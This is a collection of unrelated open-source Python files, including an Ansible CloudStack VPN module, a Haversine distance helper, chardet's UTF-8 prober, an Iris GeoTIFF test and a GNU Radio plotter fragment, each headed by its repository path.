self["config"].handleKey(KEY_ASCII)
self.__changed()
def keyNumberGlobal(self, number):
self["config"].handleKey(KEY_0 + number)
self.__changed()
def keyPageDown(self):
self["config"].pageDown()
def keyPageUp(self):
self["config"].pageUp()
def keyFile(self):
selection = self["config"].getCurrent()
if selection and selection[1].enabled and hasattr(selection[1], "description"):
self.session.openWithCallback(self.handleKeyFileCallback, ChoiceBox, selection[0],
list=zip(selection[1].description, selection[1].choices),
selection=selection[1].choices.index(selection[1].value),
keys=[])
def handleKeyFileCallback(self, answer):
if answer:
self["config"].getCurrent()[1].value = answer[1]
self["config"].invalidateCurrent()
self.__changed()
def saveAll(self):
restartgui = False
for x in self["config"].list:
if x[1].isChanged():
if x[0] == _('Show on Display'):
restartgui = True
x[1].save()
configfile.save()
self.doRestartGui(restartgui)
def doRestartGui(self, restart):
if restart:
self.session.openWithCallback(self.ExecuteRestart, MessageBox, _("Restart GUI now?"), MessageBox.TYPE_YESNO)
def ExecuteRestart(self, result):
if result:
quitMainloop(3)
	# keySave and keyCancel are just provided in case you need them;
	# you have to call them yourself.
def keySave(self):
self.saveAll()
self.close()
def cancelConfirm(self, result):
if not result:
if self.help_window_was_shown:
self["config"].getCurrent()[1].help_window.show()
return
for x in self["config"].list:
x[1].cancel()
self.close()
def closeMenuList(self, recursive = False):
self.help_window_was_shown = False
try:
self.HideHelp()
except:
pass
if self["config"].isChanged():
self.session.openWithCallback(self.cancelConfirm, MessageBox, _("Really close without saving settings?"), default = False)
else:
try:
self.close(recursive)
except:
self.session.openWithCallback(self.cancelConfirm, MessageBox, _("Really close without saving settings?"))
def keyCancel(self):
self.closeMenuList()
def closeRecursive(self):
self.closeMenuList(True)
|
cderwin/maps
|
refs/heads/master
|
api/util/mapping.py
|
1
|
from math import sin, cos, asin, sqrt, radians
class Point(object):
def __init__(self, lat, lon, unit='deg'):
self.lat = float(lat)
self.lon = float(lon)
self.unit = unit
def __getitem__(self, key):
if key.lower() in ('lat', 'latitude'):
return self.lat
if key.lower() in ('lon', 'longitude'):
return self.lon
raise KeyError('Key not \"lat\" or \"lon\"')
    def __setitem__(self, key, value):
        if key.lower() in ('lat', 'latitude'):
            self.lat = value
        elif key.lower() in ('lon', 'longitude'):
            self.lon = value
        else:
            raise KeyError('Key not \"lat\" or \"lon\"')
    def __delitem__(self, key):
        if key.lower() in ('lat', 'latitude'):
            self.lat = None
        elif key.lower() in ('lon', 'longitude'):
            self.lon = None
        else:
            raise KeyError('Key not \"lat\" or \"lon\"')
    def __iter__(self):
        # Yield (key, value) pairs so dict(point) round-trips.
        return iter((('lat', self.lat), ('lon', self.lon)))
@classmethod
def to_radians(cls, point):
if point.unit != 'rad':
lat = radians(point.lat)
lon = radians(point.lon)
return cls(lat, lon, unit='rad')
return point
@classmethod
def to_point(cls, d):
return cls(float(d['lat']), float(d['lon']))
earth_radius = {
'mi': 3959,
'km': 6371
}
def distance(p1, p2, units='mi'):
# Here I implement the Haversine formula: https://en.wikipedia.org/wiki/Haversine_formula
p1 = Point.to_radians(p1 if isinstance(p1, Point) else Point.to_point(p1))
p2 = Point.to_radians(p2 if isinstance(p2, Point) else Point.to_point(p2))
delta_lat = p1.lat - p2.lat
delta_lon = p1.lon - p2.lon
a = sin(delta_lat / 2) ** 2 + cos(p1.lat) * cos(p2.lat) * sin(delta_lon / 2) ** 2
c = 2 * asin(sqrt(a))
r = earth_radius[units] * c
return r
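if __name__ == '__main__':
    # Usage sketch (my addition): great-circle distance between two
    # approximate city coordinates, chosen only for illustration.
    new_york = Point(40.71, -74.01)
    london = Point(51.51, -0.13)
    print(distance(new_york, london))        # roughly 3460 mi
    print(distance(new_york, london, 'km'))  # roughly 5570 km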
|
nicwest/scudcloud
|
refs/heads/master
|
scudcloud-1.0/lib/resources.py
|
7
|
import os, re
class Resources:
APP_NAME = "ScudCloud Slack_SSB"
SIGNIN_URL = "https://slack.com/signin"
    MAINPAGE_URL_RE = re.compile(r'^https?://[a-zA-Z0-9_\-]+\.slack\.com/?$')
    MESSAGES_URL_RE = re.compile(r'^https?://[a-zA-Z0-9_\-]+\.slack\.com/messages/.*')
    SSO_URL_RE = re.compile(r'^https?://[a-zA-Z0-9_\-]+\.slack\.com/sso/saml/start$')
    SERVICES_URL_RE = re.compile(r'^https?://[a-zA-Z0-9_\-]+\.slack\.com/services/.*')
# It's initialized in /scudcloud script
INSTALL_DIR = None
def get_path(filename):
return os.path.join(Resources.INSTALL_DIR, 'resources', filename)
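# Illustrative only (my addition): the URL patterns above can be used to
# classify navigation targets, e.g.
#   Resources.MESSAGES_URL_RE.match('https://myteam.slack.com/messages/general')
# returns a match object, while unrelated URLs yield None. Note that
# INSTALL_DIR must be set by the launcher script before get_path() works.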
|
xen0l/ansible
|
refs/heads/devel
|
lib/ansible/modules/cloud/cloudstack/cs_vpn_connection.py
|
35
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017, René Moser <mail@renemoser.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: cs_vpn_connection
short_description: Manages site-to-site VPN connections on Apache CloudStack based clouds.
description:
- Create and remove VPN connections.
version_added: "2.5"
author: "René Moser (@resmo)"
options:
vpc:
description:
- Name of the VPC the VPN connection is related to.
required: true
vpn_customer_gateway:
description:
- Name of the VPN customer gateway.
required: true
passive:
description:
- State of the VPN connection.
- Only considered when C(state=present).
default: no
type: bool
force:
description:
- Activate the VPN gateway if not already activated on C(state=present).
- Also see M(cs_vpn_gateway).
default: no
type: bool
state:
description:
- State of the VPN connection.
default: present
choices: [ present, absent ]
domain:
description:
- Domain the VPN connection is related to.
account:
description:
- Account the VPN connection is related to.
project:
description:
- Name of the project the VPN connection is related to.
poll_async:
description:
- Poll async jobs until job has finished.
default: yes
type: bool
extends_documentation_fragment: cloudstack
'''
EXAMPLES = r'''
- name: Create a VPN connection with activated VPN gateway
local_action:
module: cs_vpn_connection
vpn_customer_gateway: my vpn connection
vpc: my vpc
- name: Create a VPN connection and force VPN gateway activation
local_action:
module: cs_vpn_connection
vpn_customer_gateway: my vpn connection
vpc: my vpc
force: yes
- name: Remove a vpn connection
local_action:
module: cs_vpn_connection
vpn_customer_gateway: my vpn connection
vpc: my vpc
state: absent
'''
RETURN = r'''
---
id:
description: UUID of the VPN connection.
returned: success
type: string
sample: 04589590-ac63-4ffc-93f5-b698b8ac38b6
vpn_gateway_id:
description: UUID of the VPN gateway.
returned: success
type: string
sample: 04589590-ac63-93f5-4ffc-b698b8ac38b6
domain:
description: Domain the VPN connection is related to.
returned: success
type: string
sample: example domain
account:
description: Account the VPN connection is related to.
returned: success
type: string
sample: example account
project:
description: Name of project the VPN connection is related to.
returned: success
type: string
sample: Production
created:
description: Date the connection was created.
returned: success
type: string
sample: 2014-12-01T14:57:57+0100
dpd:
  description: Whether dead peer detection is enabled or not.
returned: success
type: bool
sample: true
esp_lifetime:
description: Lifetime in seconds of phase 2 VPN connection.
returned: success
type: int
sample: 86400
esp_policy:
  description: ESP policy of the VPN connection.
returned: success
type: string
sample: aes256-sha1;modp1536
force_encap:
description: Whether encapsulation for NAT traversal is enforced or not.
returned: success
type: bool
sample: true
ike_lifetime:
description: Lifetime in seconds of phase 1 VPN connection.
returned: success
type: int
sample: 86400
ike_policy:
  description: IKE policy of the VPN connection.
returned: success
type: string
sample: aes256-sha1;modp1536
cidrs:
description: List of CIDRs of the customer gateway.
returned: success
type: list
sample: [ 10.10.10.0/24 ]
passive:
description: Whether the connection is passive or not.
returned: success
type: bool
sample: false
public_ip:
description: IP address of the VPN gateway.
returned: success
type: string
sample: 10.100.212.10
gateway:
description: IP address of the VPN customer gateway.
returned: success
type: string
sample: 10.101.214.10
state:
description: State of the VPN connection.
returned: success
type: string
sample: Connected
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
cs_argument_spec,
cs_required_together
)
class AnsibleCloudStackVpnConnection(AnsibleCloudStack):
def __init__(self, module):
super(AnsibleCloudStackVpnConnection, self).__init__(module)
self.returns = {
'dpd': 'dpd',
'esplifetime': 'esp_lifetime',
'esppolicy': 'esp_policy',
'gateway': 'gateway',
'ikepolicy': 'ike_policy',
'ikelifetime': 'ike_lifetime',
'publicip': 'public_ip',
'passive': 'passive',
's2svpngatewayid': 'vpn_gateway_id',
}
self.vpn_customer_gateway = None
def get_vpn_customer_gateway(self, key=None, identifier=None, refresh=False):
if not refresh and self.vpn_customer_gateway:
return self._get_by_key(key, self.vpn_customer_gateway)
args = {
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
'fetch_list': True,
}
vpn_customer_gateway = identifier or self.module.params.get('vpn_customer_gateway')
vcgws = self.query_api('listVpnCustomerGateways', **args)
if vcgws:
for vcgw in vcgws:
if vpn_customer_gateway.lower() in [vcgw['id'], vcgw['name'].lower()]:
self.vpn_customer_gateway = vcgw
return self._get_by_key(key, self.vpn_customer_gateway)
self.fail_json(msg="VPN customer gateway not found: %s" % vpn_customer_gateway)
def get_vpn_gateway(self, key=None):
args = {
'vpcid': self.get_vpc(key='id'),
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
}
vpn_gateways = self.query_api('listVpnGateways', **args)
if vpn_gateways:
return self._get_by_key(key, vpn_gateways['vpngateway'][0])
elif self.module.params.get('force'):
if self.module.check_mode:
return {}
res = self.query_api('createVpnGateway', **args)
vpn_gateway = self.poll_job(res, 'vpngateway')
return self._get_by_key(key, vpn_gateway)
self.fail_json(msg="VPN gateway not found and not forced to create one")
def get_vpn_connection(self):
args = {
'vpcid': self.get_vpc(key='id'),
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
}
vpn_conns = self.query_api('listVpnConnections', **args)
if vpn_conns:
for vpn_conn in vpn_conns['vpnconnection']:
if self.get_vpn_customer_gateway(key='id') == vpn_conn['s2scustomergatewayid']:
return vpn_conn
def present_vpn_connection(self):
vpn_conn = self.get_vpn_connection()
args = {
's2scustomergatewayid': self.get_vpn_customer_gateway(key='id'),
's2svpngatewayid': self.get_vpn_gateway(key='id'),
'passive': self.module.params.get('passive'),
}
if not vpn_conn:
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('createVpnConnection', **args)
poll_async = self.module.params.get('poll_async')
if poll_async:
vpn_conn = self.poll_job(res, 'vpnconnection')
return vpn_conn
def absent_vpn_connection(self):
vpn_conn = self.get_vpn_connection()
if vpn_conn:
self.result['changed'] = True
args = {
'id': vpn_conn['id']
}
if not self.module.check_mode:
res = self.query_api('deleteVpnConnection', **args)
poll_async = self.module.params.get('poll_async')
if poll_async:
self.poll_job(res, 'vpnconnection')
return vpn_conn
def get_result(self, vpn_conn):
super(AnsibleCloudStackVpnConnection, self).get_result(vpn_conn)
if vpn_conn:
if 'cidrlist' in vpn_conn:
self.result['cidrs'] = vpn_conn['cidrlist'].split(',') or [vpn_conn['cidrlist']]
# Ensure we return a bool
self.result['force_encap'] = True if vpn_conn.get('forceencap') else False
args = {
'key': 'name',
'identifier': vpn_conn['s2scustomergatewayid'],
'refresh': True,
}
self.result['vpn_customer_gateway'] = self.get_vpn_customer_gateway(**args)
return self.result
def main():
argument_spec = cs_argument_spec()
argument_spec.update(dict(
vpn_customer_gateway=dict(required=True),
vpc=dict(required=True),
domain=dict(),
account=dict(),
project=dict(),
zone=dict(),
passive=dict(type='bool', default=False),
force=dict(type='bool', default=False),
state=dict(choices=['present', 'absent'], default='present'),
poll_async=dict(type='bool', default=True),
))
module = AnsibleModule(
argument_spec=argument_spec,
required_together=cs_required_together(),
supports_check_mode=True
)
acs_vpn_conn = AnsibleCloudStackVpnConnection(module)
state = module.params.get('state')
if state == "absent":
vpn_conn = acs_vpn_conn.absent_vpn_connection()
else:
vpn_conn = acs_vpn_conn.present_vpn_connection()
result = acs_vpn_conn.get_result(vpn_conn)
module.exit_json(**result)
if __name__ == '__main__':
main()
|
JuliBakagianni/CEF-ELRC
|
refs/heads/master
|
lib/python2.7/site-packages/unidecode/x01d.py
|
240
|
data = (
'', # 0x00
'', # 0x01
'', # 0x02
'', # 0x03
'', # 0x04
'', # 0x05
'', # 0x06
'', # 0x07
'', # 0x08
'', # 0x09
'', # 0x0a
'', # 0x0b
'', # 0x0c
'', # 0x0d
'', # 0x0e
'', # 0x0f
'', # 0x10
'', # 0x11
'', # 0x12
'', # 0x13
'', # 0x14
'', # 0x15
'', # 0x16
'', # 0x17
'', # 0x18
'', # 0x19
'', # 0x1a
'', # 0x1b
'', # 0x1c
'', # 0x1d
'', # 0x1e
'', # 0x1f
'', # 0x20
'', # 0x21
'', # 0x22
'', # 0x23
'', # 0x24
'', # 0x25
'', # 0x26
'', # 0x27
'', # 0x28
'', # 0x29
'', # 0x2a
'', # 0x2b
'', # 0x2c
'', # 0x2d
'', # 0x2e
'', # 0x2f
'', # 0x30
'', # 0x31
'', # 0x32
'', # 0x33
'', # 0x34
'', # 0x35
'', # 0x36
'', # 0x37
'', # 0x38
'', # 0x39
'', # 0x3a
'', # 0x3b
'', # 0x3c
'', # 0x3d
'', # 0x3e
'', # 0x3f
'', # 0x40
'', # 0x41
'', # 0x42
'', # 0x43
'', # 0x44
'', # 0x45
'', # 0x46
'', # 0x47
'', # 0x48
'', # 0x49
'', # 0x4a
'', # 0x4b
'', # 0x4c
'', # 0x4d
'', # 0x4e
'', # 0x4f
'', # 0x50
'', # 0x51
'', # 0x52
'', # 0x53
'', # 0x54
'', # 0x55
'', # 0x56
'', # 0x57
'', # 0x58
'', # 0x59
'', # 0x5a
'', # 0x5b
'', # 0x5c
'', # 0x5d
'', # 0x5e
'', # 0x5f
'', # 0x60
'', # 0x61
'', # 0x62
'', # 0x63
'', # 0x64
'', # 0x65
'', # 0x66
'', # 0x67
'', # 0x68
'', # 0x69
'', # 0x6a
'', # 0x6b
'b', # 0x6c
'd', # 0x6d
'f', # 0x6e
'm', # 0x6f
'n', # 0x70
'p', # 0x71
'r', # 0x72
'r', # 0x73
's', # 0x74
't', # 0x75
'z', # 0x76
'g', # 0x77
'', # 0x78
'', # 0x79
'', # 0x7a
'', # 0x7b
'', # 0x7c
'p', # 0x7d
'', # 0x7e
'', # 0x7f
'b', # 0x80
'd', # 0x81
'f', # 0x82
'g', # 0x83
'k', # 0x84
'l', # 0x85
'm', # 0x86
'n', # 0x87
'p', # 0x88
'r', # 0x89
's', # 0x8a
'', # 0x8b
'v', # 0x8c
'x', # 0x8d
'z', # 0x8e
'', # 0x8f
'', # 0x90
'', # 0x91
'', # 0x92
'', # 0x93
'', # 0x94
'', # 0x95
'', # 0x96
'', # 0x97
'', # 0x98
'', # 0x99
'', # 0x9a
'', # 0x9b
'', # 0x9c
'', # 0x9d
'', # 0x9e
'', # 0x9f
'', # 0xa0
'', # 0xa1
'', # 0xa2
'', # 0xa3
'', # 0xa4
'', # 0xa5
'', # 0xa6
'', # 0xa7
'', # 0xa8
'', # 0xa9
'', # 0xaa
'', # 0xab
'', # 0xac
'', # 0xad
'', # 0xae
'', # 0xaf
'', # 0xb0
'', # 0xb1
'', # 0xb2
'', # 0xb3
'', # 0xb4
'', # 0xb5
'', # 0xb6
'', # 0xb7
'', # 0xb8
'', # 0xb9
'', # 0xba
'', # 0xbb
'', # 0xbc
'', # 0xbd
'', # 0xbe
'', # 0xbf
'', # 0xc0
'', # 0xc1
'', # 0xc2
'', # 0xc3
'', # 0xc4
'', # 0xc5
'', # 0xc6
'', # 0xc7
'', # 0xc8
'', # 0xc9
'', # 0xca
'', # 0xcb
'', # 0xcc
'', # 0xcd
'', # 0xce
'', # 0xcf
'', # 0xd0
'', # 0xd1
'', # 0xd2
'', # 0xd3
'', # 0xd4
'', # 0xd5
'', # 0xd6
'', # 0xd7
'', # 0xd8
'', # 0xd9
'', # 0xda
'', # 0xdb
'', # 0xdc
'', # 0xdd
'', # 0xde
'', # 0xdf
'', # 0xe0
'', # 0xe1
'', # 0xe2
'', # 0xe3
'', # 0xe4
'', # 0xe5
'', # 0xe6
'', # 0xe7
'', # 0xe8
'', # 0xe9
'', # 0xea
'', # 0xeb
'', # 0xec
'', # 0xed
'', # 0xee
'', # 0xef
'', # 0xf0
'', # 0xf1
'', # 0xf2
'', # 0xf3
'', # 0xf4
'', # 0xf5
'', # 0xf6
'', # 0xf7
'', # 0xf8
'', # 0xf9
'', # 0xfa
'', # 0xfb
'', # 0xfc
'', # 0xfd
'', # 0xfe
)
|
zak-k/iris
|
refs/heads/master
|
lib/iris/tests/experimental/test_raster.py
|
7
|
# (C) British Crown Copyright 2014 - 2016, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
import six
import iris.tests as tests
import iris
import numpy as np
import PIL.Image
@tests.skip_gdal
@tests.skip_data
class TestGeoTiffExport(tests.IrisTest):
def check_tiff_header(self, tiff_filename, expect_keys, expect_entries):
"""
Checks the given tiff file's metadata contains the expected keys,
and some matching values (not all).
"""
with open(tiff_filename, 'rb') as fh:
im = PIL.Image.open(fh)
file_keys = im.tag.keys()
missing_keys = sorted(set(expect_keys) - set(file_keys))
msg_nokeys = "Tiff header has missing keys : {}."
self.assertEqual(missing_keys, [],
msg_nokeys.format(missing_keys))
extra_keys = sorted(set(file_keys) - set(expect_keys))
msg_extrakeys = "Tiff header has extra unexpected keys : {}."
self.assertEqual(extra_keys, [],
msg_extrakeys.format(extra_keys))
msg_badval = "Tiff header entry {} has value {} != {}."
for key, value in expect_entries.items():
content = im.tag[key]
self.assertEqual(content, value,
msg_badval.format(key, content, value))
def check_tiff(self, cube, header_keys, header_items):
        # Check that the cube saves correctly to TIFF:
        # * the header contains expected keys and (some) values
        # * the data array retrieves correctly
import iris.experimental.raster
with self.temp_filename('.tif') as temp_filename:
iris.experimental.raster.export_geotiff(cube, temp_filename)
# Check the metadata is correct.
self.check_tiff_header(temp_filename, header_keys, header_items)
# Ensure that north is at the top then check the data is correct.
coord_y = cube.coord(axis='Y', dim_coords=True)
data = cube.data
if np.diff(coord_y.bounds[0]) > 0:
data = cube.data[::-1, :]
im = PIL.Image.open(temp_filename)
im_data = np.array(im)
# Currently we only support writing 32-bit tiff, when comparing
# the data ensure that it is also 32-bit
np.testing.assert_array_equal(im_data,
data.astype(np.float32))
def _check_tiff_export(self, masked, inverted=False):
tif_header = 'SMALL_total_column_co2.nc.tif_header.txt'
tif_header_keys = [256, 257, 258, 259, 262, 273,
277, 278, 279, 284, 339, 33550, 33922]
tif_header_entries = {
256: (160,),
257: (159,),
258: (32,),
259: (1,),
262: (1,),
# Skip this one: behaviour is not consistent across gdal versions.
# 273: (354, 8034, 15714, 23394, 31074, 38754, 46434,
# 54114, 61794, 69474, 77154, 84834, 92514, 100194),
277: (1,),
278: (12,),
279: (7680, 7680, 7680, 7680, 7680, 7680, 7680,
7680, 7680, 7680, 7680, 7680, 7680, 1920),
284: (1,),
339: (3,),
33550: (1.125, 1.125, 0.0),
33922: (0.0, 0.0, 0.0, -0.5625, 89.4375, 0.0)
}
fin = tests.get_data_path(('NetCDF', 'global', 'xyt',
'SMALL_total_column_co2.nc'))
cube = iris.load_cube(fin)[0]
# PIL doesn't support float64
cube.data = cube.data.astype('f4')
# Ensure longitude values are continuous and monotonically increasing,
# and discard the 'half cells' at the top and bottom of the UM output
# by extracting a subset.
east = iris.Constraint(longitude=lambda cell: cell < 180)
non_edge = iris.Constraint(latitude=lambda cell: -90 < cell < 90)
cube = cube.extract(east & non_edge)
cube.coord('longitude').guess_bounds()
cube.coord('latitude').guess_bounds()
if masked:
# Mask some of the data + expect a slightly different header...
cube.data = np.ma.masked_where(cube.data <= 380, cube.data)
# There is an additional key..
tif_header_keys += [42113]
# Don't add a check entry for this, as coding changed between gdal
# version 1 and 2, *and* between Python2 and Python3.
# tif_header_entries[42113] = (u'1e+20',)
if inverted:
# Check with the latitude coordinate (and the corresponding
# cube.data) inverted.
# The output should be exactly the same.
coord = cube.coord('latitude')
coord.points = coord.points[::-1]
coord.bounds = None
coord.guess_bounds()
cube.data = cube.data[::-1, :]
self.check_tiff(cube, tif_header_keys, tif_header_entries)
def test_unmasked(self):
self._check_tiff_export(masked=False)
def test_masked(self):
self._check_tiff_export(masked=True)
def test_inverted(self):
self._check_tiff_export(masked=False, inverted=True)
if __name__ == "__main__":
tests.main()
|
mozaik-association/mozaik
|
refs/heads/8.0
|
odoo_addons/mozaik_address/tests/__init__.py
|
2
|
# -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of mozaik_address, an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# mozaik_address is free software:
# you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# mozaik_address is distributed in the hope that it will
# be useful but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the
# GNU Affero General Public License
# along with mozaik_address.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import test_address_address
from . import test_postal_coordinate
|
harshilasu/LinkurApp
|
refs/heads/master
|
y/google-cloud-sdk/.install/.backup/lib/requests/packages/chardet/utf8prober.py
|
2918
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from . import constants
from .charsetprober import CharSetProber
from .codingstatemachine import CodingStateMachine
from .mbcssm import UTF8SMModel
ONE_CHAR_PROB = 0.5
class UTF8Prober(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(UTF8SMModel)
self.reset()
def reset(self):
CharSetProber.reset(self)
self._mCodingSM.reset()
self._mNumOfMBChar = 0
def get_charset_name(self):
return "utf-8"
def feed(self, aBuf):
for c in aBuf:
codingState = self._mCodingSM.next_state(c)
if codingState == constants.eError:
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
if self._mCodingSM.get_current_charlen() >= 2:
self._mNumOfMBChar += 1
if self.get_state() == constants.eDetecting:
if self.get_confidence() > constants.SHORTCUT_THRESHOLD:
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
unlike = 0.99
if self._mNumOfMBChar < 6:
for i in range(0, self._mNumOfMBChar):
unlike = unlike * ONE_CHAR_PROB
return 1.0 - unlike
else:
return unlike
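if __name__ == '__main__':
    # Usage sketch (my addition, not part of the original module): feed a
    # byte string containing one multi-byte UTF-8 sequence ('\xc3\xa9' is
    # e-acute) and read back the detected charset and confidence.
    prober = UTF8Prober()
    prober.feed('hello \xc3\xa9')
    print prober.get_charset_name(), prober.get_confidence()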
|
Kamik423/uni_plan
|
refs/heads/master
|
plan/plan/lib64/python3.4/site-packages/setuptools/command/py36compat.py
|
286
|
import os
from glob import glob
from distutils.util import convert_path
from distutils.command import sdist
from setuptools.extern.six.moves import filter
class sdist_add_defaults:
"""
Mix-in providing forward-compatibility for functionality as found in
distutils on Python 3.7.
Do not edit the code in this class except to update functionality
as implemented in distutils. Instead, override in the subclass.
"""
def add_defaults(self):
"""Add all the default files to self.filelist:
- README or README.txt
- setup.py
- test/test*.py
- all pure Python modules mentioned in setup script
- all files pointed by package_data (build_py)
- all files defined in data_files.
- all files defined as scripts.
- all C sources listed as part of extensions or C libraries
in the setup script (doesn't catch C headers!)
Warns if (README or README.txt) or setup.py are missing; everything
else is optional.
"""
self._add_defaults_standards()
self._add_defaults_optional()
self._add_defaults_python()
self._add_defaults_data_files()
self._add_defaults_ext()
self._add_defaults_c_libs()
self._add_defaults_scripts()
@staticmethod
def _cs_path_exists(fspath):
"""
Case-sensitive path existence check
>>> sdist_add_defaults._cs_path_exists(__file__)
True
>>> sdist_add_defaults._cs_path_exists(__file__.upper())
False
"""
if not os.path.exists(fspath):
return False
# make absolute so we always have a directory
abspath = os.path.abspath(fspath)
directory, filename = os.path.split(abspath)
return filename in os.listdir(directory)
def _add_defaults_standards(self):
standards = [self.READMES, self.distribution.script_name]
for fn in standards:
if isinstance(fn, tuple):
alts = fn
got_it = False
for fn in alts:
if self._cs_path_exists(fn):
got_it = True
self.filelist.append(fn)
break
if not got_it:
self.warn("standard file not found: should have one of " +
', '.join(alts))
else:
if self._cs_path_exists(fn):
self.filelist.append(fn)
else:
self.warn("standard file '%s' not found" % fn)
def _add_defaults_optional(self):
optional = ['test/test*.py', 'setup.cfg']
for pattern in optional:
files = filter(os.path.isfile, glob(pattern))
self.filelist.extend(files)
def _add_defaults_python(self):
# build_py is used to get:
# - python modules
# - files defined in package_data
build_py = self.get_finalized_command('build_py')
# getting python files
if self.distribution.has_pure_modules():
self.filelist.extend(build_py.get_source_files())
# getting package_data files
# (computed in build_py.data_files by build_py.finalize_options)
for pkg, src_dir, build_dir, filenames in build_py.data_files:
for filename in filenames:
self.filelist.append(os.path.join(src_dir, filename))
def _add_defaults_data_files(self):
# getting distribution.data_files
if self.distribution.has_data_files():
for item in self.distribution.data_files:
if isinstance(item, str):
# plain file
item = convert_path(item)
if os.path.isfile(item):
self.filelist.append(item)
else:
# a (dirname, filenames) tuple
dirname, filenames = item
for f in filenames:
f = convert_path(f)
if os.path.isfile(f):
self.filelist.append(f)
def _add_defaults_ext(self):
if self.distribution.has_ext_modules():
build_ext = self.get_finalized_command('build_ext')
self.filelist.extend(build_ext.get_source_files())
def _add_defaults_c_libs(self):
if self.distribution.has_c_libraries():
build_clib = self.get_finalized_command('build_clib')
self.filelist.extend(build_clib.get_source_files())
def _add_defaults_scripts(self):
if self.distribution.has_scripts():
build_scripts = self.get_finalized_command('build_scripts')
self.filelist.extend(build_scripts.get_source_files())
if hasattr(sdist.sdist, '_add_defaults_standards'):
# disable the functionality already available upstream
class sdist_add_defaults:
pass
|
zitouni/gnuradio-3.6.1
|
refs/heads/master
|
gr-wxgui/src/python/plotter/channel_plotter.py
|
14
|
#
# Copyright 2008, 2009, 2010 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import wx
from grid_plotter_base import grid_plotter_base
from OpenGL import GL
import common
import numpy
import gltext
import math
LEGEND_TEXT_FONT_SIZE = 8
LEGEND_BOX_PADDING = 3
MIN_PADDING = 35, 10, 0, 0 #top, right, bottom, left
#constants for the waveform storage
SAMPLES_KEY = 'samples'
COLOR_SPEC_KEY = 'color_spec'
MARKERY_KEY = 'marker'
TRIG_OFF_KEY = 'trig_off'
##################################################
# Channel Plotter for X Y Waveforms
##################################################
class channel_plotter(grid_plotter_base):
def __init__(self, parent):
"""
Create a new channel plotter.
"""
#init
grid_plotter_base.__init__(self, parent, MIN_PADDING)
self.set_use_persistence(False)
#setup legend cache
self._legend_cache = self.new_gl_cache(self._draw_legend, 50)
self.enable_legend(False)
#setup waveform cache
self._waveform_cache = self.new_gl_cache(self._draw_waveforms, 50)
self._channels = dict()
#init channel plotter
self.register_init(self._init_channel_plotter)
self.callback = None
def _init_channel_plotter(self):
"""
Run gl initialization tasks.
"""
GL.glEnableClientState(GL.GL_VERTEX_ARRAY)
def enable_legend(self, enable=None):
"""
Enable/disable the legend.
@param enable true to enable
@return the enable state when None
"""
if enable is None: return self._enable_legend
self.lock()
self._enable_legend = enable
self._legend_cache.changed(True)
self.unlock()
def _draw_waveforms(self):
"""
Draw the waveforms for each channel.
Scale the waveform data to the grid using gl matrix operations.
"""
#use scissor to prevent drawing outside grid
GL.glEnable(GL.GL_SCISSOR_TEST)
GL.glScissor(
self.padding_left+1,
self.padding_bottom+1,
self.width-self.padding_left-self.padding_right-1,
self.height-self.padding_top-self.padding_bottom-1,
)
for channel in reversed(sorted(self._channels.keys())):
